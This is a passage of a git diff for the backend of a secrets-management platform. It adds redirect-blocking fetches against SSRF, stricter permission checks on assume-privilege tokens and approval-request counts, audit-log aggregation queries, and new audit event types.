project = await requestMemoize(requestMemoKeys.projectFindById(accessApprovalRequest.projectId), () => + projectDAL.findById(accessApprovalRequest.projectId) + ); if (!project) { throw new NotFoundError({ message: "The project associated with this access request was not found." }); } @@ -765,8 +792,6 @@ export const accessApprovalRequestServiceFactory = ({ }, tx ); - - await permissionService.invalidateProjectPermissionCache(accessApprovalRequest.projectId, tx); } } @@ -886,8 +911,6 @@ export const accessApprovalRequestServiceFactory = ({ await additionalPrivilegeDAL.deleteById(accessApprovalRequest.privilegeId, tx); } - await permissionService.invalidateProjectPermissionCache(accessApprovalRequest.projectId, tx); - return result; }); @@ -905,7 +928,7 @@ export const accessApprovalRequestServiceFactory = ({ const project = await projectDAL.findProjectBySlug(projectSlug, actorOrgId); if (!project) throw new NotFoundError({ message: `Project with slug '${projectSlug}' not found` }); - await permissionService.getProjectPermission({ + const { permission } = await permissionService.getProjectPermission({ actor, actorId, projectId: project.id, @@ -914,7 +937,16 @@ export const accessApprovalRequestServiceFactory = ({ actionProjectType: ActionProjectType.SecretManager }); - const count = await accessApprovalRequestDAL.getCount({ projectId: project.id, policyId }); + const canReadAllApprovalRequests = permission.can( + ProjectPermissionApprovalRequestActions.Read, + ProjectPermissionSub.ApprovalRequests + ); + + const count = await accessApprovalRequestDAL.getCount({ + projectId: project.id, + policyId, + requestedByUserId: canReadAllApprovalRequests ? undefined : actorId + }); return { count }; }; diff --git a/backend/src/ee/services/ai-mcp-endpoint/ai-mcp-endpoint-service.ts b/backend/src/ee/services/ai-mcp-endpoint/ai-mcp-endpoint-service.ts index 3b3f331c526..d38e8294853 100644 --- a/backend/src/ee/services/ai-mcp-endpoint/ai-mcp-endpoint-service.ts +++ b/backend/src/ee/services/ai-mcp-endpoint/ai-mcp-endpoint-service.ts @@ -9,7 +9,7 @@ import { CallToolRequestSchema, ListToolsRequestSchema } from "@modelcontextprot import { z } from "zod"; import { ActionProjectType, TAiMcpEndpoints } from "@app/db/schemas"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { crypto as cryptoModule } from "@app/lib/crypto"; import { DatabaseErrorCode } from "@app/lib/error-codes"; @@ -28,6 +28,7 @@ import { TUserDALFactory } from "@app/services/user/user-dal"; import { TAiMcpActivityLogServiceFactory } from "../ai-mcp-activity-log/ai-mcp-activity-log-service"; import { TAiMcpServerDALFactory } from "../ai-mcp-server/ai-mcp-server-dal"; import { AiMcpServerCredentialMode } from "../ai-mcp-server/ai-mcp-server-enum"; +import { ssrfSafeMcpFetch } from "../ai-mcp-server/ai-mcp-server-fns"; import { TAiMcpServerServiceFactory } from "../ai-mcp-server/ai-mcp-server-service"; import { TAiMcpServerToolDALFactory } from "../ai-mcp-server/ai-mcp-server-tool-dal"; import { TAiMcpServerUserCredentialDALFactory } from "../ai-mcp-server/ai-mcp-server-user-credential-dal"; @@ -112,8 +113,6 @@ const OauthChallengeCodeSchema = z.object({ }) }); -const OAUTH_FLOW_EXPIRY_IN_SECS = 5 * 60; - // PKCE challenge computation const computePkceChallenge = (codeVerifier: string) => { const sha256 = crypto.createHash("sha256").update(codeVerifier).digest(); @@ -322,6 +321,7 @@ export const aiMcpEndpointServiceFactory = ({ }); const clientTransport = new StreamableHTTPClientTransport(new URL(serverUrl), { + fetch: ssrfSafeMcpFetch, requestInit: { headers } }); @@ -1017,7 +1017,7 @@ export const aiMcpEndpointServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpEndpointOAuthClient(clientId), - OAUTH_FLOW_EXPIRY_IN_SECS, + KeyStoreTtls.AiMcpEndpointOAuthFlowInSeconds, JSON.stringify(payload) ); @@ -1033,7 +1033,7 @@ export const aiMcpEndpointServiceFactory = ({ // Update with state await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpEndpointOAuthClient(clientId), - OAUTH_FLOW_EXPIRY_IN_SECS, + KeyStoreTtls.AiMcpEndpointOAuthFlowInSeconds, JSON.stringify({ ...JSON.parse(oauthClientCache), state }) ); }; @@ -1083,7 +1083,7 @@ export const aiMcpEndpointServiceFactory = ({ const code = crypto.randomBytes(32).toString("hex"); await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpEndpointOAuthCode(clientId, code), - OAUTH_FLOW_EXPIRY_IN_SECS, + KeyStoreTtls.AiMcpEndpointOAuthFlowInSeconds, JSON.stringify({ codeChallenge, codeChallengeMethod, @@ -1352,6 +1352,7 @@ export const aiMcpEndpointServiceFactory = ({ }); const transport = new StreamableHTTPClientTransport(new URL(targetUrl), { + fetch: ssrfSafeMcpFetch, requestInit: { headers: { Authorization: `Bearer ${accessToken}` @@ -1368,11 +1369,12 @@ export const aiMcpEndpointServiceFactory = ({ const err = error as { code?: string | number; cause?: { code?: string } }; const errCode = err?.code || err?.cause?.code; - let message = "An unknown error occurred"; + // All non-auth failures share one message: separating connection-refused + // from other errors would let an attacker probe whether internal ports + // are open by cycling redirect targets. + let message = "Unable to verify token"; if (errCode === 401 || errCode === 403) { message = "Invalid token"; - } else if (errCode === "ECONNREFUSED" || errCode === "ENOTFOUND" || errCode === "ETIMEDOUT") { - message = "Server unreachable"; } return { valid: false, message }; diff --git a/backend/src/ee/services/ai-mcp-server/ai-mcp-server-fns.ts b/backend/src/ee/services/ai-mcp-server/ai-mcp-server-fns.ts new file mode 100644 index 00000000000..c31dce6e249 --- /dev/null +++ b/backend/src/ee/services/ai-mcp-server/ai-mcp-server-fns.ts @@ -0,0 +1,5 @@ +// Refuses to follow HTTP redirects when talking to an MCP server. The server URL +// is validated against private IPs at registration time; without this, a 302 at +// request time could redirect the backend fetch to internal network addresses. +export const ssrfSafeMcpFetch = (url: string | URL, init?: RequestInit): Promise => + fetch(url, { ...init, redirect: "manual" }); diff --git a/backend/src/ee/services/ai-mcp-server/ai-mcp-server-service.ts b/backend/src/ee/services/ai-mcp-server/ai-mcp-server-service.ts index 859162d7ee7..9b81452707e 100644 --- a/backend/src/ee/services/ai-mcp-server/ai-mcp-server-service.ts +++ b/backend/src/ee/services/ai-mcp-server/ai-mcp-server-service.ts @@ -7,11 +7,11 @@ import { Client } from "@modelcontextprotocol/sdk/client/index.js"; // eslint-disable-next-line @typescript-eslint/ban-ts-comment // @ts-ignore - MCP SDK uses ESM with .js extensions which don't resolve types with moduleResolution: "Node" import { StreamableHTTPClientTransport } from "@modelcontextprotocol/sdk/client/streamableHttp.js"; -import axios from "axios"; +import { isAxiosError } from "axios"; import { ActionProjectType, OrganizationActionScope } from "@app/db/schemas"; import { verifyHostInputValidity } from "@app/ee/services/dynamic-secret/dynamic-secret-fns"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { request } from "@app/lib/config/request"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; @@ -30,6 +30,7 @@ import { TPermissionServiceFactory } from "../permission/permission-service-type import { ProjectPermissionActions, ProjectPermissionSub } from "../permission/project-permission"; import { TAiMcpServerDALFactory } from "./ai-mcp-server-dal"; import { AiMcpServerAuthMethod, AiMcpServerCredentialMode, AiMcpServerStatus } from "./ai-mcp-server-enum"; +import { ssrfSafeMcpFetch } from "./ai-mcp-server-fns"; import { TAiMcpServerToolDALFactory } from "./ai-mcp-server-tool-dal"; import { TAiMcpServerCredentials, @@ -64,8 +65,6 @@ type TAiMcpServerServiceFactoryDep = { export type TAiMcpServerServiceFactory = ReturnType; -const OAUTH_SESSION_TTL_SECONDS = 10 * 60; // 10 minutes - // Buffer time before token expiry to trigger refresh (5 minutes) const TOKEN_REFRESH_BUFFER_MS = 5 * 60 * 1000; @@ -86,12 +85,12 @@ const refreshOAuthToken = async ( try { // First try: origin-only format const originOnlyUrl = `${serverUrlObj.origin}/.well-known/oauth-authorization-server`; - const { data } = await request.get(originOnlyUrl); + const { data } = await ssrfSafeGet(originOnlyUrl); serverMetadata = data; } catch { // Second try: origin + pathname format const pathnameUrl = `${serverUrlObj.origin}/.well-known/oauth-authorization-server${serverUrlObj.pathname !== "/" ? serverUrlObj.pathname : ""}`; - const { data } = await request.get(pathnameUrl); + const { data } = await ssrfSafeGet(pathnameUrl); serverMetadata = data; } @@ -106,7 +105,7 @@ const refreshOAuthToken = async ( tokenParams.client_secret = clientSecret; } - const { data: tokenResponse } = await request.post( + const { data: tokenResponse } = await ssrfSafePost( serverMetadata.token_endpoint, new URLSearchParams(tokenParams).toString(), { @@ -221,6 +220,7 @@ export const aiMcpServerServiceFactory = ({ } const transport = new StreamableHTTPClientTransport(new URL(targetUrl), { + fetch: ssrfSafeMcpFetch, requestInit: { headers: { Authorization: `Bearer ${accessToken}` @@ -441,7 +441,7 @@ export const aiMcpServerServiceFactory = ({ } } catch (err) { // Log non-404 errors for debugging, but still fall through - if (!axios.isAxiosError(err) || err.response?.status !== 404) { + if (!isAxiosError(err) || err.response?.status !== 404) { logger.warn(err, "Failed to fetch OAuth authorization server metadata"); } } @@ -609,7 +609,7 @@ export const aiMcpServerServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpServerOAuth(sessionId), - OAUTH_SESSION_TTL_SECONDS, + KeyStoreTtls.AiMcpServerOAuthSessionInSeconds, JSON.stringify(sessionData) ); @@ -695,7 +695,7 @@ export const aiMcpServerServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.AiMcpServerOAuth(sessionId), - OAUTH_SESSION_TTL_SECONDS, + KeyStoreTtls.AiMcpServerOAuthSessionInSeconds, JSON.stringify(updatedSession) ); diff --git a/backend/src/ee/services/assume-privilege/assume-privilege-service.ts b/backend/src/ee/services/assume-privilege/assume-privilege-service.ts index 491db592846..679898ed91c 100644 --- a/backend/src/ee/services/assume-privilege/assume-privilege-service.ts +++ b/backend/src/ee/services/assume-privilege/assume-privilege-service.ts @@ -3,9 +3,8 @@ import { ForbiddenError, subject } from "@casl/ability"; import { ActionProjectType } from "@app/db/schemas"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; -import { ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; +import { ForbiddenRequestError } from "@app/lib/errors"; import { ActorType } from "@app/services/auth/auth-type"; -import { TProjectDALFactory } from "@app/services/project/project-dal"; import { TPermissionServiceFactory } from "../permission/permission-service-types"; import { @@ -16,12 +15,10 @@ import { import { TAssumePrivilegeServiceFactory } from "./assume-privilege-types"; type TAssumePrivilegeServiceFactoryDep = { - projectDAL: Pick; permissionService: Pick; }; export const assumePrivilegeServiceFactory = ({ - projectDAL, permissionService }: TAssumePrivilegeServiceFactoryDep): TAssumePrivilegeServiceFactory => { const assumeProjectPrivileges: TAssumePrivilegeServiceFactory["assumeProjectPrivileges"] = async ({ @@ -31,8 +28,6 @@ export const assumePrivilegeServiceFactory = ({ actorPermissionDetails, tokenVersionId }) => { - const project = await projectDAL.findById(projectId); - if (!project) throw new NotFoundError({ message: `Project with ID '${projectId}' not found` }); const { permission } = await permissionService.getProjectPermission({ actor: actorPermissionDetails.type, actorId: actorPermissionDetails.id, @@ -80,9 +75,11 @@ export const assumePrivilegeServiceFactory = ({ return { actorType: targetActorType, actorId: targetActorId, projectId, assumePrivilegesToken }; }; - const verifyAssumePrivilegeToken: TAssumePrivilegeServiceFactory["verifyAssumePrivilegeToken"] = ( + const verifyAssumePrivilegeToken: TAssumePrivilegeServiceFactory["verifyAssumePrivilegeToken"] = async ( token, - tokenVersionId + tokenVersionId, + actorAuthMethod, + actorOrgId ) => { const appCfg = getConfig(); const decodedToken = crypto.jwt().verify(token, appCfg.AUTH_SECRET) as { @@ -95,6 +92,28 @@ export const assumePrivilegeServiceFactory = ({ if (decodedToken.tokenVersionId !== tokenVersionId) { throw new ForbiddenRequestError({ message: "Invalid token version" }); } + + const requesterPermission = await permissionService.getProjectPermission({ + actor: ActorType.USER, + actorId: decodedToken.requesterId, + projectId: decodedToken.projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.Any + }); + + if (decodedToken.actorType === ActorType.USER) { + ForbiddenError.from(requesterPermission.permission).throwUnlessCan( + ProjectPermissionMemberActions.AssumePrivileges, + ProjectPermissionSub.Member + ); + } else { + ForbiddenError.from(requesterPermission.permission).throwUnlessCan( + ProjectPermissionIdentityActions.AssumePrivileges, + subject(ProjectPermissionSub.Identity, { identityId: decodedToken.actorId }) + ); + } + return decodedToken; }; diff --git a/backend/src/ee/services/assume-privilege/assume-privilege-types.ts b/backend/src/ee/services/assume-privilege/assume-privilege-types.ts index 999fcce41ac..095ef0f8bd8 100644 --- a/backend/src/ee/services/assume-privilege/assume-privilege-types.ts +++ b/backend/src/ee/services/assume-privilege/assume-privilege-types.ts @@ -1,5 +1,5 @@ import { OrgServiceActor } from "@app/lib/types"; -import { ActorType } from "@app/services/auth/auth-type"; +import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type"; export type TAssumeProjectPrivilegeDTO = { targetActorType: ActorType.USER | ActorType.IDENTITY; @@ -24,12 +24,14 @@ export interface TAssumePrivilegeServiceFactory { }>; verifyAssumePrivilegeToken: ( token: string, - tokenVersionId: string - ) => { + tokenVersionId: string, + actorAuthMethod: ActorAuthMethod, + actorOrgId: string + ) => Promise<{ tokenVersionId: string; projectId: string; requesterId: string; actorType: ActorType; actorId: string; - }; + }>; } diff --git a/backend/src/ee/services/audit-log-stream/custom/custom-provider-factory.ts b/backend/src/ee/services/audit-log-stream/custom/custom-provider-factory.ts index d9250b29cda..47dc1a24ee3 100644 --- a/backend/src/ee/services/audit-log-stream/custom/custom-provider-factory.ts +++ b/backend/src/ee/services/audit-log-stream/custom/custom-provider-factory.ts @@ -29,7 +29,8 @@ export const CustomProviderFactory = () => { { ping: "ok" }, { headers: streamHeaders, - timeout: AUDIT_LOG_STREAM_TIMEOUT + timeout: AUDIT_LOG_STREAM_TIMEOUT, + maxRedirects: 0 } ) .catch((err) => { diff --git a/backend/src/ee/services/audit-log/audit-log-dal.ts b/backend/src/ee/services/audit-log/audit-log-dal.ts index 7ad9233d0cf..cf4d8763f9f 100644 --- a/backend/src/ee/services/audit-log/audit-log-dal.ts +++ b/backend/src/ee/services/audit-log/audit-log-dal.ts @@ -13,6 +13,14 @@ import { ActorType } from "@app/services/auth/auth-type"; import { ACTOR_TYPE_TO_METADATA_ID_KEY, EventType, filterableSecretEvents } from "./audit-log-types"; +type TAggregateQuery = { + orgId: string; + projectId: string; + eventTypes: EventType[]; + startDate: string; + endDate: string; +}; + export interface TAuditLogDALFactory extends Omit, "find"> { pruneAuditLog: () => Promise; getApproximateRowCount: () => Promise; @@ -27,6 +35,15 @@ export interface TAuditLogDALFactory extends Omit, " }, tx?: knex.Knex ) => Promise; + countByDateAndActor: ( + arg: TAggregateQuery, + tx?: knex.Knex + ) => Promise<{ date: string; actor: string; actorMetadata: unknown; count: number }[]>; + countByIpAddress: (arg: TAggregateQuery, tx?: knex.Knex) => Promise<{ ipAddress: string; count: number }[]>; + countByAuthMethod: ( + arg: TAggregateQuery, + tx?: knex.Knex + ) => Promise<{ actor: string; actorMetadata: unknown; count: number }[]>; } type TFindQuery = { @@ -248,5 +265,111 @@ export const auditLogDALFactory = (db: TDbClient) => { return auditLogOrm.create(tx); }; - return { ...auditLogOrm, create, pruneAuditLog, getApproximateRowCount, find }; + const countByDateAndActor = async ( + { + orgId, + projectId, + eventTypes, + startDate, + endDate + }: { + orgId: string; + projectId: string; + eventTypes: EventType[]; + startDate: string; + endDate: string; + }, + tx?: knex.Knex + ) => { + const rows = await (tx || db.replicaNode())(TableName.AuditLog) + .where(`${TableName.AuditLog}.orgId`, orgId) + .where(`${TableName.AuditLog}.projectId`, projectId) + .whereIn(`${TableName.AuditLog}.eventType`, eventTypes) + .whereRaw(`"${TableName.AuditLog}"."createdAt" >= ?::timestamptz`, [startDate]) + .whereRaw(`"${TableName.AuditLog}"."createdAt" < ?::timestamptz`, [endDate]) + .select( + db.raw(`DATE("${TableName.AuditLog}"."createdAt") as date`), + `${TableName.AuditLog}.actor`, + `${TableName.AuditLog}.actorMetadata` + ) + .groupByRaw( + `DATE("${TableName.AuditLog}"."createdAt"), "${TableName.AuditLog}"."actor", "${TableName.AuditLog}"."actorMetadata"` + ) + .select(db.raw("COUNT(*)::int as count")) + .timeout(1000 * 120); + + return rows as { date: string; actor: string; actorMetadata: unknown; count: number }[]; + }; + + const countByIpAddress = async ( + { + orgId, + projectId, + eventTypes, + startDate, + endDate + }: { + orgId: string; + projectId: string; + eventTypes: EventType[]; + startDate: string; + endDate: string; + }, + tx?: knex.Knex + ) => { + const rows = await (tx || db.replicaNode())(TableName.AuditLog) + .where(`${TableName.AuditLog}.orgId`, orgId) + .where(`${TableName.AuditLog}.projectId`, projectId) + .whereIn(`${TableName.AuditLog}.eventType`, eventTypes) + .whereRaw(`"${TableName.AuditLog}"."createdAt" >= ?::timestamptz`, [startDate]) + .whereRaw(`"${TableName.AuditLog}"."createdAt" < ?::timestamptz`, [endDate]) + .whereNotNull(`${TableName.AuditLog}.ipAddress`) + .select(`${TableName.AuditLog}.ipAddress`) + .groupBy(`${TableName.AuditLog}.ipAddress`) + .select(db.raw("COUNT(*)::int as count")) + .timeout(1000 * 120); + + return rows as { ipAddress: string; count: number }[]; + }; + + const countByAuthMethod = async ( + { + orgId, + projectId, + eventTypes, + startDate, + endDate + }: { + orgId: string; + projectId: string; + eventTypes: EventType[]; + startDate: string; + endDate: string; + }, + tx?: knex.Knex + ) => { + const rows = await (tx || db.replicaNode())(TableName.AuditLog) + .where(`${TableName.AuditLog}.orgId`, orgId) + .where(`${TableName.AuditLog}.projectId`, projectId) + .whereIn(`${TableName.AuditLog}.eventType`, eventTypes) + .whereRaw(`"${TableName.AuditLog}"."createdAt" >= ?::timestamptz`, [startDate]) + .whereRaw(`"${TableName.AuditLog}"."createdAt" < ?::timestamptz`, [endDate]) + .select(`${TableName.AuditLog}.actor`, `${TableName.AuditLog}.actorMetadata`) + .groupBy(`${TableName.AuditLog}.actor`, `${TableName.AuditLog}.actorMetadata`) + .select(db.raw("COUNT(*)::int as count")) + .timeout(1000 * 120); + + return rows as { actor: string; actorMetadata: unknown; count: number }[]; + }; + + return { + ...auditLogOrm, + create, + pruneAuditLog, + getApproximateRowCount, + find, + countByDateAndActor, + countByIpAddress, + countByAuthMethod + }; }; diff --git a/backend/src/ee/services/audit-log/audit-log-service.ts b/backend/src/ee/services/audit-log/audit-log-service.ts index cefcd8349de..9c30f1838a5 100644 --- a/backend/src/ee/services/audit-log/audit-log-service.ts +++ b/backend/src/ee/services/audit-log/audit-log-service.ts @@ -2,7 +2,7 @@ import { ForbiddenError } from "@casl/ability"; import { requestContext } from "@fastify/request-context"; import { ActionProjectType, OrganizationActionScope, TUsers } from "@app/db/schemas"; -import { TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { BadRequestError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; @@ -23,7 +23,6 @@ import { ACTOR_TYPE_TO_METADATA_ID_KEY, EventType, TAuditLogServiceFactory } fro const AUDIT_LOG_ROW_WARNING_THRESHOLD = 350_000_000; const AUDIT_LOG_ALERT_ROW_INCREMENT = 10_000_000; -const AUDIT_LOG_MIGRATION_ALERT_STATE_TTL_SECONDS = 7 * 24 * 60 * 60; // 7 days type TAuditLogServiceFactoryDep = { auditLogDAL: TAuditLogDALFactory; @@ -192,7 +191,7 @@ export const auditLogServiceFactory = ({ if (rowCount < AUDIT_LOG_ROW_WARNING_THRESHOLD) return; - const lastAlertedRowCountStr: string | null = await keyStore.getItem("audit-log-migration-alert-last-row-count"); + const lastAlertedRowCountStr: string | null = await keyStore.getItem(KeyStorePrefixes.AuditLogMigrationAlert); const lastAlertedRowCount = lastAlertedRowCountStr ? Number(lastAlertedRowCountStr) : 0; if (lastAlertedRowCount > 0 && rowCount < lastAlertedRowCount + AUDIT_LOG_ALERT_ROW_INCREMENT) return; @@ -210,8 +209,8 @@ export const auditLogServiceFactory = ({ if (superAdminsResult.users.length === 0) { await keyStore.setItemWithExpiry( - "audit-log-migration-alert-last-row-count", - AUDIT_LOG_MIGRATION_ALERT_STATE_TTL_SECONDS, + KeyStorePrefixes.AuditLogMigrationAlert, + KeyStoreTtls.AuditLogMigrationAlertInSeconds, String(rowCount) ); return; @@ -253,8 +252,8 @@ export const auditLogServiceFactory = ({ }); await keyStore.setItemWithExpiry( - "audit-log-migration-alert-last-row-count", - AUDIT_LOG_MIGRATION_ALERT_STATE_TTL_SECONDS, + KeyStorePrefixes.AuditLogMigrationAlert, + KeyStoreTtls.AuditLogMigrationAlertInSeconds, String(rowCount) ); logger.info(`checkPostgresAuditLogVolumeMigrationAlert: alert sent to super admins (rowCount=${rowCount})`); diff --git a/backend/src/ee/services/audit-log/audit-log-types.ts b/backend/src/ee/services/audit-log/audit-log-types.ts index 6e5fbb4ddd6..64f6d1a3d09 100644 --- a/backend/src/ee/services/audit-log/audit-log-types.ts +++ b/backend/src/ee/services/audit-log/audit-log-types.ts @@ -1,4 +1,6 @@ import { ProjectType } from "@app/db/schemas"; +import { PamParentType } from "@app/ee/services/pam-account/pam-account-enums"; +import { ScepChallengeType } from "@app/ee/services/pki-scep/challenge"; import { TCreateProjectTemplateDTO, TUpdateProjectTemplateDTO @@ -88,7 +90,8 @@ export type TCreateAuditLogDTO = { | AcmeProfileActor | AcmeAccountActor | EstAccountActor - | ScepAccountActor; + | ScepAccountActor + | GatewayActor; orgId?: string; projectId?: string; } & BaseAuthData; @@ -386,6 +389,9 @@ export enum EventType { GET_PKI_ALERT = "get-pki-alert", UPDATE_PKI_ALERT = "update-pki-alert", DELETE_PKI_ALERT = "delete-pki-alert", + CREATE_CERTIFICATE_INVENTORY_VIEW = "create-certificate-inventory-view", + UPDATE_CERTIFICATE_INVENTORY_VIEW = "update-certificate-inventory-view", + DELETE_CERTIFICATE_INVENTORY_VIEW = "delete-certificate-inventory-view", CREATE_PKI_COLLECTION = "create-pki-collection", GET_PKI_COLLECTION = "get-pki-collection", UPDATE_PKI_COLLECTION = "update-pki-collection", @@ -443,6 +449,7 @@ export enum EventType { GET_CERTIFICATE_REQUEST = "get-certificate-request", GET_CERTIFICATE_FROM_REQUEST = "get-certificate-from-request", LIST_CERTIFICATE_REQUESTS = "list-certificate-requests", + TRIGGER_CERTIFICATE_REQUEST_VALIDATION = "trigger-certificate-request-validation", ATTEMPT_CREATE_SLACK_INTEGRATION = "attempt-create-slack-integration", ATTEMPT_REINSTALL_SLACK_INTEGRATION = "attempt-reinstall-slack-integration", GET_PROJECT_SLACK_CONFIG = "get-project-slack-config", @@ -468,6 +475,7 @@ export enum EventType { CMEK_LIST_SIGNING_ALGORITHMS = "cmek-list-signing-algorithms", CMEK_GET_PUBLIC_KEY = "cmek-get-public-key", CMEK_GET_PRIVATE_KEY = "cmek-get-private-key", + CMEK_BULK_EXPORT_PRIVATE_KEYS = "cmek-bulk-export-private-keys", UPDATE_EXTERNAL_GROUP_ORG_ROLE_MAPPINGS = "update-external-group-org-role-mapping", GET_EXTERNAL_GROUP_ORG_ROLE_MAPPINGS = "get-external-group-org-role-mapping", @@ -536,6 +544,7 @@ export enum EventType { CREATE_SECRET_ROTATION = "create-secret-rotation", UPDATE_SECRET_ROTATION = "update-secret-rotation", DELETE_SECRET_ROTATION = "delete-secret-rotation", + MOVE_SECRET_ROTATION = "move-secret-rotation", SECRET_ROTATION_ROTATE_SECRETS = "secret-rotation-rotate-secrets", RECONCILE_SECRET_ROTATION = "reconcile-secret-rotation", @@ -596,6 +605,12 @@ export enum EventType { DASHBOARD_GET_SECRET_VALUE = "dashboard-get-secret-value", DASHBOARD_GET_SECRET_VERSION_VALUE = "dashboard-get-secret-version-value", + VIEW_INSIGHTS_AUTH_METHODS = "view-insights-auth-methods", + VIEW_INSIGHTS_SECRETS_MANAGEMENT_CALENDAR = "view-insights-secrets-management-calendar", + VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_VOLUME = "view-insights-secrets-management-access-volume", + VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_LOCATIONS = "view-insights-secrets-management-access-locations", + VIEW_INSIGHTS_SECRETS_MANAGEMENT_SUMMARY = "view-insights-secrets-management-summary", + PAM_SESSION_CREDENTIALS_GET = "pam-session-credentials-get", PAM_SESSION_START = "pam-session-start", PAM_SESSION_LOGS_UPDATE = "pam-session-logs-update", @@ -610,6 +625,7 @@ export enum EventType { PAM_ACCOUNT_LIST = "pam-account-list", PAM_ACCOUNT_GET = "pam-account-get", PAM_ACCOUNT_ACCESS = "pam-account-access", + PAM_ACCOUNT_AWS_CONSOLE_URL_GENERATED = "pam-account-aws-console-url-generated", PAM_ACCOUNT_CREATE = "pam-account-create", PAM_ACCOUNT_UPDATE = "pam-account-update", PAM_ACCOUNT_DELETE = "pam-account-delete", @@ -627,6 +643,11 @@ export enum EventType { PAM_RESOURCE_CREATE = "pam-resource-create", PAM_RESOURCE_UPDATE = "pam-resource-update", PAM_RESOURCE_DELETE = "pam-resource-delete", + PAM_DOMAIN_LIST = "pam-domain-list", + PAM_DOMAIN_GET = "pam-domain-get", + PAM_DOMAIN_CREATE = "pam-domain-create", + PAM_DOMAIN_UPDATE = "pam-domain-update", + PAM_DOMAIN_DELETE = "pam-domain-delete", PAM_DISCOVERY_SOURCE_LIST = "pam-discovery-source-list", PAM_DISCOVERY_SOURCE_GET = "pam-discovery-source-get", PAM_DISCOVERY_SOURCE_CREATE = "pam-discovery-source-create", @@ -736,16 +757,33 @@ export enum EventType { PKI_SIGNER_SIGN = "pki-signer-sign", SCEP_ENROLLMENT = "scep-enrollment", SCEP_RENEWAL = "scep-renewal", + SCEP_DYNAMIC_CHALLENGE_GENERATED = "scep-dynamic-challenge-generated", // Secret Validation Rules SECRET_VALIDATION_RULE_CREATE = "secret-validation-rule-create", SECRET_VALIDATION_RULE_UPDATE = "secret-validation-rule-update", SECRET_VALIDATION_RULE_DELETE = "secret-validation-rule-delete", + // External Migration + EXTERNAL_MIGRATION_CREATE = "external-migration-create", + EXTERNAL_MIGRATION_UPDATE = "external-migration-update", + EXTERNAL_MIGRATION_DELETE = "external-migration-delete", // Email Domains CREATE_EMAIL_DOMAIN = "create-email-domain", VERIFY_EMAIL_DOMAIN = "verify-email-domain", - DELETE_EMAIL_DOMAIN = "delete-email-domain" + DELETE_EMAIL_DOMAIN = "delete-email-domain", + + // Gateway Enrollment Tokens + GATEWAY_CREATE = "gateway-create", + GATEWAY_ENROLLMENT_TOKEN_CREATE = "gateway-enrollment-token-create", + GATEWAY_ENROLL = "gateway-enroll", + + // Gateway Pools + GATEWAY_POOL_CREATE = "gateway-pool-create", + GATEWAY_POOL_UPDATE = "gateway-pool-update", + GATEWAY_POOL_DELETE = "gateway-pool-delete", + GATEWAY_POOL_ADD_MEMBER = "gateway-pool-add-member", + GATEWAY_POOL_REMOVE_MEMBER = "gateway-pool-remove-member" } // Maps each actor type to the JSONB key that holds the actor's primary ID in actorMetadata. @@ -760,7 +798,8 @@ export const ACTOR_TYPE_TO_METADATA_ID_KEY: Partial> = [ActorType.ACME_PROFILE]: "profileId", [ActorType.ACME_ACCOUNT]: "accountId", [ActorType.EST_ACCOUNT]: "profileId", - [ActorType.SCEP_ACCOUNT]: "profileId" + [ActorType.SCEP_ACCOUNT]: "profileId", + [ActorType.GATEWAY]: "gatewayId" }; export const filterableSecretEvents: EventType[] = [ @@ -790,7 +829,7 @@ interface IdentityActorMetadata { identityId: string; name: string; permission?: Record; - + authMethod?: string; aws?: TAWSAuthDetails; kubernetes?: TKubernetesAuthDetails; oidc?: TOidcAuthDetails; @@ -824,6 +863,10 @@ interface ScepAccountActorMetadata { interface UnknownUserActorMetadata {} +interface GatewayActorMetadata { + gatewayId: string; +} + export interface UserActor { type: ActorType.USER; metadata: UserActorMetadata; @@ -877,6 +920,12 @@ export interface ScepAccountActor { type: ActorType.SCEP_ACCOUNT; metadata: ScepAccountActorMetadata; } + +export interface GatewayActor { + type: ActorType.GATEWAY; + metadata: GatewayActorMetadata; +} + export type Actor = | UserActor | ServiceActor @@ -887,7 +936,8 @@ export type Actor = | AcmeProfileActor | AcmeAccountActor | EstAccountActor - | ScepAccountActor; + | ScepAccountActor + | GatewayActor; interface GetSecretsEvent { type: EventType.GET_SECRETS; @@ -2249,6 +2299,9 @@ interface CreateWebhookEvent { environment: string; secretPath: string; isDisabled: boolean; + eventsFilter?: { + eventName: string; + }[]; }; } @@ -2259,6 +2312,9 @@ interface UpdateWebhookStatusEvent { environment: string; secretPath: string; isDisabled: boolean; + eventsFilter?: { + eventName: string; + }[]; }; } @@ -3013,6 +3069,36 @@ interface DeletePkiCollectionItem { }; } +interface CreateCertificateInventoryView { + type: EventType.CREATE_CERTIFICATE_INVENTORY_VIEW; + metadata: { + viewId: string; + name: string; + filters?: Record; + columns?: string[]; + isShared?: boolean; + }; +} + +interface UpdateCertificateInventoryView { + type: EventType.UPDATE_CERTIFICATE_INVENTORY_VIEW; + metadata: { + viewId: string; + name?: string; + filters?: Record; + columns?: string[]; + isShared?: boolean; + }; +} + +interface DeleteCertificateInventoryView { + type: EventType.DELETE_CERTIFICATE_INVENTORY_VIEW; + metadata: { + viewId: string; + name: string; + }; +} + interface CreatePkiSubscriber { type: EventType.CREATE_PKI_SUBSCRIBER; metadata: { @@ -3589,6 +3675,13 @@ interface CmekGetPrivateKeyEvent { }; } +interface 